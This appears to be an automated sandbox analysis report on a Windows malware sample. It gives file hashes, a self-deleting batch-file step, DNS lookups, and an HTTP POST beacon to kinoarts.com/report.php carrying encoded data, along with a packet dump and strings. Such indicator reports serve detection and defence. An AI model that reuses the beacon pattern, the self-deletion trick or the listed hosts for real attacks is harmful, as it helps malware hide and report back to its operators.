Analysis Date2014-09-09 19:47:38
MD5be7bd46e5e06d525fd592a4875623e91
SHA1c0168b9215d1ab7ecd71069d068f312684268356

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.4cfd md5: a3e623463ffbddabb0253bee548ff038 sha1: c73386953a214bd6b011b570ddc4dbf0c5b7318b size: 22016
Section.fcg8 md5: ef99ffc684660742fb7fa480d0bc1093 sha1: c42b120822d7542dde0d038965e02191fc5b669a size: 14336
Section.gd874 md5: 2a79d6ef7225df669c19f411e98ff43d sha1: 7cd92adf2a13748c4566a46e7344b09d02c70f08 size: 56320
Section.efdfa md5: ca06a699c709f8cc152f1251e7e53c35 sha1: f79079e67f63ea4d6916b91340a20e2a489f9d33 size: 3072
Section.rsrc md5: 4e76faaf68e6a2385613cffd21a37ad2 sha1: 0a750b60ad9921b2e597e330b0ba9fa9547d1eb6 size: 1536
Timestamp2007-06-15 21:57:10
PEhash80e11822f6a3b8f255c433fd444f59bfa878b02b
IMPhash12dd3737582dcfa2e3821908b63ce70d

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates ProcessC:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates Filenul
Deletes FileC:\malware.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat

Network Details:

DNSkinoarts.com
Type: A
192.31.186.4
DNSpetroartsstudio.com
Type: A
DNSgreeartsday.com
Type: A
HTTP POSThttp://kinoarts.com/report.php?data=v26MmjSySdSkDj907AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4YGmLzbY+RtufRrKX/N/tqt+7rkA==
User-Agent: wget 3.0
Flows TCP192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7265 706f7274 2e706870   POST /report.php
0x00000010 (00016)   3f646174 613d7632 364d6d6a 53795364   ?data=v26MmjSySd
0x00000020 (00032)   536b446a 39303741 55595272 4d375937   SkDj907AUYRrM7Y7
0x00000030 (00048)   2f754939 45384f64 59495358 30694c42   /uI9E8OdYISX0iLB
0x00000040 (00064)   734f5751 61483242 58617954 33774255   sOWQaH2BXayT3wBU
0x00000050 (00080)   33436346 58656763 79557638 34554b51   3CcFXegcyUv84UKQ
0x00000060 (00096)   69424d46 3459476d 4c7a6259 2b527475   iBMF4YGmLzbY+Rtu
0x00000070 (00112)   6652724b 582f4e2f 7471742b 37726b41   fRrKX/N/tqt+7rkA
0x00000080 (00128)   3d3d2048 5454502f 312e310d 0a416363   == HTTP/1.1..Acc
0x00000090 (00144)   6570743a 202a2f0d 0a436f6e 74656e74   ept: */..Content
0x000000a0 (00160)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x000000b0 (00176)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x000000c0 (00192)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x000000d0 (00208)   67656e74 3a207767 65742033 2e300d0a   gent: wget 3.0..
0x000000e0 (00224)   486f7374 3a206b69 6e6f6172 74732e63   Host: kinoarts.c
0x000000f0 (00240)   6f6d0d0a 436f6e74 656e742d 4c656e67   om..Content-Leng
0x00000100 (00256)   74683a20 3132310d 0a436f6e 6e656374   th: 121..Connect
0x00000110 (00272)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d756a6e 5433324f 2f463971 73447941   =ujnT32O/F9qsDyA
0x00000150 (00336)   7a36566c 4d533735 33502f58 34664d4d   z6VlMS753P/X4fMM
0x00000160 (00352)   78523930 4e43436f 33645531 43485744   xR90NCCo3dU1CHWD
0x00000170 (00368)   5a303065 43324879 32625379 47513058   Z00eC2Hy2bSyGQ0X
0x00000180 (00384)   5431702f 572f5a49 614a6b2b 4f644441   T1p/W/ZIaJk+OdDA
0x00000190 (00400)   7a42324b 364c746d 52314c61 432f716e   zB2K6LtmR1LaC/qn
0x000001a0 (00416)   3949756b 362b3732 33775761 2f536b54   9Iuk6+723wWa/SkT
0x000001b0 (00432)   7248413d 3d                           rHA==


Strings
....
j
AFHFB6B
B09B792
F30G36
G4H1DEC
RC_RCDATA3
RC_RCDATA4
'"""""""""""""""
"""""""""""
"""(""""""_
05C79H
(0p+gt|
0uwvxs
2c11bf4cacc4da649h42h0f
40gag49ah7eddd2fg2885d
5Nfv7D
,6b"b-+
,6b"b\v@
,6b"bV
"6b"@(h
79.gtvSR
7|;qra_N
"""a"""""""&"""
a31hh30b6a6aed70ede730e84f76f7g1fh8b40
advapi32.dll
"""""""""""""""a"""g""" """!"""j""""""
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
&""BZ|D
c1cfa8147feba4d716h2<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
c."""b
CompareStringA
CopyFileA
CopyFileExA
DeleteFileA
DeleteFileW
:dgSlX
DialogBoxParamW
"""e""""C
.efdfa
ExitProcess
ExitThread
"""F0R
`.fcg8
FindClose
FormatMessageA
Fq}ptR
FreeResource
.gd874
GetCPInfo
GetFileType
GetLastError
GetLocalTime
GetStdHandle
GetWindowTextLengthA
GlobalFree
""""""""gR
h+)9KWh
HeapAlloc
H"""fPX
hV[/ ~
HXT`pe
Ii;Bkp
JdxQ8 
kernel32.dll
lstrcatA
lstrcmpA
lstrlenA
=+#@\n
	n)Pk?
p1xk~n
pibH7)t
qScWXn
`"""R\
rdfQ>g
ReadFile
RegCreateKeyA
RegCreateKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegEnumValueA
RegLoadKeyA
RegOpenKeyA
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
R\i_Ks6
@.rsrc
      </security>
      <security>
sW@M(:
\@TBR:6b"@f
!This program cannot be run in DOS mode.
Tl7)1Y
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
tT8`k1
tX`"""bVt
ue-fF5
user32.dll
UxazTV
vL""""BXB
)<v.Yq
w[&%:P
'>}wWC
""""X.
x*H!-0
Xj"""d"""""""d"""g"""""""""""
xJiS$i
x(l\<'
yWtJ`>r(z